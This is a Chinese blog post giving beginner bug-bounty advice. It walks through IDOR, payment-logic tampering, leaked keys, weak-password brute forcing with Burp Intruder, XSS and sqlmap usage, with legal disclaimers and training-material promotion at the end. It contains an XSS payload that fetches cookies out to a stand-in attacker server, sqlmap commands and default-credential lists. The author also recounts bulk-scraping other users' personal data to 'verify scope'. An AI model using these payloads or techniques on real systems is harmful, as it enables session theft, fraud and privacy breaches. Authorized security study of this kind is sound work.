三个月拿下5个CVE:我的漏洞挖掘实战经验,收藏这篇少走半年弯路

📅 发布时间:2026/7/8 12:55:22 👁️ 浏览次数:
三个月拿下5个CVE:我的漏洞挖掘实战经验,收藏这篇少走半年弯路
三个月拿下5个CVE我的漏洞挖掘实战经验收藏这篇少走半年弯路文章作者从零基础起步三个月内提交17个漏洞并获得5个CVE编号分享了漏洞挖掘的实用经验。详细解答了收入潜力、编程门槛和合法性问题推荐五大易上手漏洞类型逻辑漏洞、信息泄露、弱口令、XSS、SQL注入提供免费工具清单、工作流程和报告写作技巧。强调正确方法、持续练习和好奇心是成功关键提醒读者必须在授权范围内测试遵守网络安全法律法规。导语 三个月前我还是个小白现在已提交17个漏洞拿到5个CVE编号。这不是天赋是方法。一、先回答你最关心的3个问题Q1漏洞挖掘能赚钱吗能。但别指望一夜暴富。真实收入参考新手期0-3个月几百到几千/月成长期3-12个月几千到几万/月高手期1年几万到几十万/月我目前处于成长期上个月收入1.2万Q2需要会编程吗不需要。我大学是文科代码只懂皮毛。 但我会用工具、看逻辑、改参数、写报告。这行最值钱的不是写代码能力 而是发现问题的眼睛。Q3违法吗在授权范围内测试 合法 未经授权测试 违法本文只教你在合法渠道挖洞漏洞众测平台补天、漏洞盒子企业SRC安全应急响应中心开源项目GitHub上明确欢迎安全测试的二、我的第一个漏洞从0到1的全过程时间2025年12月15日平台某在线教育网站漏洞类型水平越权奖金800元 1个CVE发现过程Step 1注册账号正常浏览10分钟 └── 发现个人中心URL/student/10086/profile Step 2改数字测试1分钟 └── 改成 /student/10087/profile └── 看到了别人的姓名、手机号、课程记录 Step 3验证影响范围10分钟 └── 写了脚本批量测试发现影响10万用户 Step 4写报告提交30分钟 └── 按平台模板填写附截图和复现视频 Step 5等待审核3天 └── 厂商确认漏洞发放奖金和CVE编号关键心得这个漏洞没有任何技术含量就是改了个数字。 但90%的人不会想到去改那个数字。三、新手装备清单全部免费工具用途下载地址Burp Suite Community抓包、改参数、重放请求portswigger.netChrome浏览器F12开发者工具看源码、调接口自带Wappalyzer插件识别网站技术栈Chrome商店HackBar插件快速构造测试payloadChrome商店安装Burp的坑我踩过1. 必须装CA证书否则HTTPS抓不到包 2. 证书装完后要重启浏览器 3. 代理端口默认8080如果被占用要改一句话总结工具只是放大器核心是你的测试思路。四、新手最该学的5类漏洞按易上手排序 第1名逻辑漏洞推荐新手优先为什么先学它不需要懂代码不需要复杂工具只需要不按套路出牌的思维实战案例支付逻辑漏洞某电商网站下单时抓包看到 price199quantity1 测试思路 1. 把price改成1 → 1元买199元商品 ✓ 成功 2. 把quantity改成-1 → 负数购买 ✓ 成功 3. 并发请求 → 重复下单 ✓ 成功核心心法开发者假设用户会正常使用你要假设用户是坏人。 第2名敏感信息泄露去哪找1. 页面源代码CtrlU 2. JS文件F12 → Sources 3. 接口返回F12 → Network → Response 4. 特殊地址 - /.git/config 源码泄露 - /.env 配置文件泄露 - /api/swagger-ui.html 接口文档暴露我挖到的一个真实案例某网站前端JS里发现 const API_KEY sk-live-xxxxxxxxxxxxxxxx; const API_SECRET xxxxxxxxxxxxxxxxxxxxxx; 这是支付接口的密钥。 用这两个值可以直接调用支付API给自己退款。 第3名弱口令/爆破不是无脑跑字典而是有策略常见弱口令TOP10admin/admin admin/123456 admin/admin123 test/test root/root针对性构造公司名缩写 年份alibaba2024、 Tencent2024 系统名 123oa123、erp123、crm123工具Burp Intruder1. 抓登录请求发送到Intruder 2. 标记用户名和密码位置 3. 加载字典设置线程 4. 开始爆破看返回长度差异注意控制频率别打挂了网站。第4名XSS跨站脚本最简单的测试在搜索框、评论区、用户名处输入 scriptalert(1)/script 如果弹出1 → 存在XSS进阶payloadimgsrcxonerroralert(document.cookie) svg onloadfetch(http://你的服务器/?cdocument.cookie)危害偷Cookie → 冒充登录钓鱼 → 诱导输入密码键盘记录 → 记录输入第5名SQL注入快速检测在参数后加单引号 ?id1 → 页面报错 ?id1 -- → 页面正常 加and条件 ?id1 and 11 → 正常 ?id1 and 12 → 异常工具辅助SQLMap# 检测 sqlmap -uhttp://target.com/news?id1--batch # 爆库 sqlmap -uhttp://target.com/news?id1--dbs提醒先理解原理再用工具否则只是脚本小子。五、我的每日工作流程可直接复制上午2小时 ├── 信息收集找3个新目标 ├── 子域名、目录、技术栈 └── 记录到Excel 下午3小时 ├── 选1个目标深度测试 ├── 按checklist逐个功能点过 └── 发现可疑点深入挖掘 晚上1小时 ├── 整理今日发现 ├── 写报告或继续验证 └── 社区学习看别人的报告Checklist每个功能点必查越权访问改ID参数敏感信息泄露看源码、接口返回XSS输入六、如何写出被认可的漏洞报告好报告 清晰复现 明确危害 可行建议模板【标题】XX网站XX接口存在XX漏洞 【类型】逻辑漏洞-水平越权 【等级】高危 【描述】 XX接口未校验用户权限通过修改XX参数可XX 导致XX后果。 【复现步骤】 1. 登录账号A访问XX页面 2. 抓包得到请求GET /api/xx?id1 3. 修改id参数为2重放请求 4. 成功获取账号B的XX信息 【Payload】 附完整请求包 【危害证明】 附截图/视频 【修复建议】 1. 接口增加权限校验 2. ID使用随机字符串 3. 增加访问日志七、给新手的10条血泪建议从逻辑漏洞开始—— 最快有正反馈做好笔记—— 我建了Notion数据库记录所有测试过的点多看报告—— 补天、HackerOne公开报告是最好教材加入社区—— T00ls、先知、看雪有问题随时问别忽视低危—— 信息泄露往往是高危入口学会看JS—— 前端藏着大量接口和密钥保持耐心—— 我第一个月只挖到1个漏洞别贪心—— 先求有再求多再求高遵守规则—— unauthorized测试 违法享受过程—— 挖洞是技术运气的游戏八、资源推荐学习资料《Web安全深度剖析》入门圣经《白帽子讲Web安全》进阶PortSwigger Web Security Academy免费实战社区/平台补天、漏洞盒子国内众测HackerOne、Bugcrowd国际平台T00ls、先知社区、看雪论坛工具清单Burp Suite抓包神器SQLMapSQL注入检测Nmap端口扫描Subfinder子域名收集九、写在最后三个月前我在知乎看到一句话“漏洞挖掘是少数普通人可以通过努力达到专业水准的网络安全领域。”现在我信了。不需要名校背景不需要大厂履历不需要天赋异禀。只需要正确的方法 持续的练习 一点点好奇心。我的第18个漏洞正在挖掘中你的第一个呢 本期福利关注后回复「工具包」领取Burp Suite汉化版 常用插件渗透测试常用字典用户名/密码/目录我整理的100个漏洞案例库下期预告《从CVE到万元奖金我的5个经典漏洞复盘》⚠️ 法律声明与责任限制1. 法律合规本文所述技术仅供网络安全教育和防御目的使用。读者应严格遵守《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》等相关法律法规。2. 禁止行为严禁将本文所述技术用于以下行为未经授权访问计算机信息系统窃取、泄露、篡改、毁损他人数据干扰他人网络正常功能制作、传播计算机病毒等破坏性程序其他危害网络安全的行为3. 测试授权任何安全测试必须获得目标系统的明确书面授权。未经授权的测试可能构成非法侵入计算机信息系统罪刑法第285条破坏计算机信息系统罪刑法第286条侵犯公民个人信息罪刑法第253条之一4. 漏洞披露发现安全漏洞后应通过以下渠道负责任地披露厂商官方安全响应中心SRC国家信息安全漏洞共享平台CNVD国家信息安全漏洞库CNNVDCommon Vulnerabilities and ExposuresCVE文章来自网上侵权请联系博主题外话黑客/网络安全学习路线今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。网络安全学习资源分享:下面给大家分享一份2025最新版的网络安全学习路线资料帮助新人小白更系统、更快速的学习黑客技术一、2025最新网络安全学习路线一个明确的学习路线可以帮助新人了解从哪里开始按照什么顺序学习以及需要掌握哪些知识点。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击我们把学习路线分成L1到L4四个阶段一步步带你从入门到进阶从理论到实战。L1级别:网络安全的基础入门L1阶段我们会去了解计算机网络的基础知识以及网络安全在行业的应用和分析学习理解安全基础的核心原理关键技术以及PHP编程基础通过证书考试可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。L2级别网络安全的技术进阶L2阶段我们会去学习渗透测试包括情报收集、弱口令与口令爆破以及各大类型漏洞还有漏洞挖掘和安全检查项目可参加CISP-PTE证书考试。L3级别网络安全的高阶提升L3阶段我们会去学习反序列漏洞、RCE漏洞也会学习到内网渗透实战、靶场实战和技术提取技术系统学习Python编程和实战。参加CISP-PTE考试。L4级别网络安全的项目实战L4阶段我们会更加深入进行实战训练包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握而L3 L4更多的是通过项目实战来掌握核心技术针对以上网安的学习路线我们也整理了对应的学习视频教程和配套的学习资料。二、技术文档和经典PDF书籍书籍和学习文档资料是学习网络安全过程中必不可少的我自己整理技术文档包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本书籍含电子版PDF三、网络安全视频教程对于很多自学或者没有基础的同学来说书籍这些纯文字类的学习教材会觉得比较晦涩难以理解因此我们提供了丰富的网安视频教程以动态、形象的方式展示技术概念帮助你更快、更轻松地掌握核心知识。网上虽然也有很多的学习资源但基本上都残缺不全的这是我自己录的网安视频教程上面路线图的每一个知识点我都有配套的视频讲解。四、网络安全护网行动/CTF比赛学以致用当你的理论知识积累到一定程度就需要通过项目实战在实际操作中检验和巩固你所学到的知识同时为你找工作和职业发展打下坚实的基础。五、网络安全工具包、面试题和源码“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等感兴趣的同学不容错过。面试不仅是技术的较量更需要充分的准备。在你已经掌握了技术之后就需要开始准备面试我们将提供精心整理的网安面试题库涵盖当前面试中可能遇到的各种技术问题让你在面试中游刃有余。如果你是要找网安方面的工作它们绝对能帮你大忙。这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的如果大家有好的题目或者好的见解欢迎分享。参考解析深信服官网、奇安信官网、Freebuf、csdn等内容特点条理清晰含图像化表示更加易懂。内容概要包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…**读者福利 |**CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击